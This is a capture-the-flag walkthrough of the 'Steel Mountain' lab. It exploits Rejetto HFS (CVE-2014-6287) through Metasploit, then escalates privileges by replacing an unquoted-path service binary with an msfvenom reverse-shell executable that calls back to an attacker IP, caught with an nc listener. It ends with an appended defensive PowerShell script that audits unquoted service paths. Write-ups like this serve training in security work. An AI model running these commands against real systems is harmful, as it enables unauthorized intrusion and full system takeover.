Steel Mountain Walkthrough

Aditya Jha
Sep 3, 2023

INTRODUCTION:

This room, Steel Mountain, is based on the series Mr. Robot.

The very first question in the introduction is:

What is the name of Employee of the month?

If we go to the page and download the image, we can see the name there, as shown in the image below:

Employee Of The Month

INITIAL ACCESS:

On this machine, as on any other, our first step is to run an nmap scan:

Command: nmap -T5 -p- -A <Target IP>

The results are shown in the screenshots below:

Q2.1 Scan the machine with nmap. What is the other port running a web server on?

Ans2.1: 8080

Q2.2 Take a look at the other web server. What file server is running?

Ans2.2: Rejetto HTTP FILE SERVER

We can find this on port 8080 of the machine:

If we click on it, we will be redirected to its page.

Now we can search Google for the CVE of HttpFileServer 2.3 and we will get the answer.

Q2.3 What is the CVE number to exploit this file server?

Ans2.3: 2014-6287

Now we will use Metasploit to get the initial access.

To open Metasploit, we can use the command: msfconsole

Now we can search for an exploit for HttpFileServer.

We found an exploit for this:

We can select it with:

Command: use 0

Now we will set RPORT, RHOST and LHOST:

Command: set RPORT 8080

set RHOST <Target IP>

set LHOST <Attacker IP>

After setting all of these:

Run Command: exploit

Now we will get the shell:

Now we can find the flag inside C:/Users/bill/Desktop

We got the user flag.

Now we have to escalate our privileges to get the root flag.

PRIVILEGE ESCALATION:

Now we can use a script to escalate privileges:

PowerUp.ps1

We can upload this script to the machine through Metasploit with the command: upload <script Path>

Now we will run this script.

First, the commands will be:

load powershell

powershell_shell

Now we will run the script:

Command: . .\PowerUp.ps1

The result will look like this:

Here we will get the answers to our questions:

Q3.2: Take close attention to the CanRestart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability?

Ans3.2: AdvancedSystemCareService9

Now we will make a malicious application named ASCService and replace the original with it to get a reverse shell.

First we have to drop into a command shell using the

command: shell

Now we will stop the service with:

Command: sc stop AdvancedSystemCareService9

Now we will create a malicious application on our machine using msfvenom.

Command: msfvenom -p windows/shell_reverse_tcp LHOST=<Attacker IP> LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o ASCService.exe

Now we will upload this to the victim machine.

The process is the same as before.

Now we will copy this application to the original path of ASCService.

Command: copy "C:\Users\bill\Desktop\ASCService.exe" "C:\Program Files (x86)\IObit\Advanced SystemCare\"

Now we will set up a listener to get root access.

Command: nc -nlvp 4443

Now we will start the service to get the root shell.

Command: sc start AdvancedSystemCareService9

After starting the service,

we finally get the reverse shell through our listener:

Now we can get the root flag inside: C:\Users\Administrator\Desktop

We finally got the root flag, as you can see in the above screenshot.

Access and Escalation Without Metasploit:

Q4.2 What powershell -c command could we run to manually find out the service name?

*Format is "powershell -c "command here""*

Ans4.2: powershell -c Get-Service
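To see by hand why PowerUp reported AdvancedSystemCareService9 as an unquoted service path, and what the corrected value looks like, here is a small audit script. It is an added example, not code from this walkthrough or from PowerUp; the function names are hypothetical, the first sample row is constructed, and the second is assembled from the destination folder and file name in the copy command above.

```powershell
# Added example: flag services whose PathName is unquoted and contains spaces,
# list the paths Windows would try first, and print the quoted form that fixes it.
function Get-UnquotedPathCandidate {
    param([string]$PathName)
    $p = "$PathName".Trim()
    if ($p.StartsWith('"')) { return }             # quoted: parsed as one token
    if ($p -notmatch '^(.*?\.exe)\b') { return }   # keep the executable, drop arguments
    $exe = $Matches[1]
    # Windows tries each space-delimited prefix as "<prefix>.exe", left to right.
    $idx = $exe.IndexOf(' ')
    while ($idx -ge 0) {
        $exe.Substring(0, $idx) + '.exe'           # emitted to the pipeline
        $idx = $exe.IndexOf(' ', $idx + 1)
    }
}

function Test-ServicePath {
    param([string]$Name, [string]$PathName)
    $tried = @(Get-UnquotedPathCandidate $PathName)
    if ($tried.Count -eq 0) { return }             # nothing ambiguous to report
    $null = $PathName.Trim() -match '^(.*?\.exe)\b(.*)$'
    [pscustomobject]@{
        Service    = $Name
        PathName   = $PathName
        TriedFirst = $tried -join '; '
        QuotedFix  = '"' + $Matches[1] + '"' + $Matches[2]
    }
}

# Sample rows so the script runs offline.
$sample = @(
    # Constructed: already quoted, so it is not reported.
    @{ Name = 'ExampleQuotedSvc'
       PathName = '"C:\Program Files\Example\svc.exe" -k run' },
    # Assembled from the copy command in the walkthrough (folder + ASCService.exe).
    @{ Name = 'AdvancedSystemCareService9'
       PathName = 'C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe' }
)
$sample | ForEach-Object { Test-ServicePath $_.Name $_.PathName } | Format-List

# On a live host, audit every installed service the same way:
# Get-CimInstance Win32_Service |
#     ForEach-Object { Test-ServicePath $_.Name $_.PathName } | Format-List
```

Any service reported here should have its ImagePath rewritten to the QuotedFix value, and the folders listed under TriedFirst should not be writable by non-administrators.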
